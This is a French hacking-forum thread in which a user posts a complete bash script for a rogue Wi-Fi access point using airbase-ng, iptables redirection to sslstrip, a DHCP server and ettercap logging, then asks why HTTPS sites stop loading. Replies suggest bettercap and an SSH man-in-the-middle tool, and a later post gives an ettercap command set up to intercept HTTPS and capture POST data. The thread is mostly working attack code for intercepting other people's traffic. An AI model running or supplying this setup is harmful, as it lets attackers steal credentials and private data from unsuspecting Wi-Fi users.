Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-05-2017 16:32:24

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 282

[FAKE AP] Ettercap obsolète?

Bonjour à tous, je suis de retour après quelques années d'absence ! Avec mes études j'ai beaucoup manqué de temps pour toucher à kali, je travaillais plutôt sur la sécurité logicielle (buffer overflow, format string...).

J'ai donc mi Kali à jour en version 2 et j'ai écris (et recupéré des morceaux ailleurs) un petit script qui permet de créer un fake AP. Mais j'ai un petit problème, je redirige bien tout le traffic sur le port 80 vers le port 10000 (port par defaut de sslstrip). Mon server DHCP fonctionne bien, j'ai bien internet en me connectant dessus. Mais quand je veux lancer ettercap pour écouter mon réseau, l'ordinateur connecté au fake AP n'a pas accès aux sites sécurisés par SSL alors que sans ettercap, on peut.

Je vous met donc mon script:

#!/bin/bash

unset ESSID
while [ -z "${ESSID}" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done
unset CHAN
while [ -z "${CHAN}" ]; do read -p "Channel you would like to broadcast on: " CHAN; done
airmon-ng start wlan1 ${CHAN} &> /dev/null
sleep 3

xterm -geometry ${width}x${height}-${x}+${y} -T "Airbase-NG" -e airbase-ng -e "${ESSID}" -c "${CHAN}" wlan1mon &
sleep 5

echo -e "\e[1;34m[*]\e[0m Configuring tunneled interface."
ifconfig at0 up
ifconfig at0 192.168.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 dev at0
sleep 2

echo -e "\e[1;34m[*]\e[0m Setting up iptables to handle traffic seen by the tunneled interface."
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2
echo -e "\e[1;34m[*]\e[0m Configuring IP forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward
sleep 1

echo -e "\e[1;34m[*]\e[0m Launching Tail."
xterm -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &

service isc-dhcp-server start
sleep 2

xterm -T "Ettercap" -e ettercap -a /etc/ettercap/etter.conf -T -q -l /root/etterlog.txt -i at0 &

echo -e "\e[1;34m[*]\e[0m Launching SSLStrip..."
xterm -T "SSLStrip" -e sslstrip -p -f -k &

Pour nettoyer les tables et fermer le serveur dhcp:

#quit
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "0" > /proc/sys/net/ipv4/ip_forward
service isc-dhcp-server stop

La configuration de mon DHCP:

ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.100 192.168.0.200;
option domain-name-servers 8.8.8.8;
option routers 192.168.0.1;
option broadcast-address 192.168.0.255;
default-lease-time 600;
max-lease-time 7200;
}ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.100 192.168.0.200;
option domain-name-servers 8.8.8.8;
option routers 192.168.0.1;
option broadcast-address 192.168.0.255;
default-lease-time 600;
max-lease-time 7200;
}

Je me demande donc si ettercap est obsolète (ce qui m'étonnerait) ou si j'ai fais quelque chose de mauvais. J'espère que vous pourrez m'aider !
Merci d'avance !

Dernière modification par Anthonyy59 (30-05-2017 19:20:00)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-06-2017 22:06:50

Sinaï00
Membre Radioactif
Inscription : 08-04-2015
Messages : 67

Re : [FAKE AP] Ettercap obsolète?

Salut Anthonyy59
Merci pour tes tutos sur youtube, il m'ont bien aider quand je commencé tout juste.
Je suis ton plus grand fan !!  big_smile
Non je rigole mais franchement ça ma bien dépanné.

Du coup je sais pas trop pour ettercap. J'ai juste personnellement tester bettercap mais sans grand succés ...
Juste ça marche avec sslstip+ du coup ça pseudo fonctionne pour certain site qui n'ont pas le hsts je crois.

Il semblerai que cette outil soit relativement fonctionnelle  mais j'ai pas encore trouvé le temps de tester l'outil :

https://github.com/jtesta/ssh-mitm

bonne soirée

Dernière modification par Sinaï00 (12-06-2017 22:09:08)

Hors Ligne

#3 23-07-2017 17:55:18

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 282

Re : [FAKE AP] Ettercap obsolète?

Ahah merci de ton commentaire Sinai ! Content que mes tutos t'ont aidé malgré le fait qu'ils vieillissent !

Oui bettercap est bien mieux, j'avais un petit probleme avec Ruby mais c'est réglé !

J'ai redirigé le port 80 vers 10000 et le 443 vers 10001. J'ai tapé la commande:

ettercap -I at0 -G 192.168.0.1 -T 192.168.0.104 --no-spoofing --proxy-port 10000 --proxy-https-port 10001 -P POST

Pour écouter les 2 ports mais toujours pas moyen d'aller sur des sites sécurisés...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 952 02-07-2017 12:38:10 par moumoufle
20 844 10-11-2016 12:54:26 par koala
8 4554 15-06-2016 04:48:18 par Teeknofil
2 795 27-10-2015 00:21:23 par zoz25
AIDE : AWUS036H Fake? par Jilhali
16 1615 09-06-2015 20:32:48 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]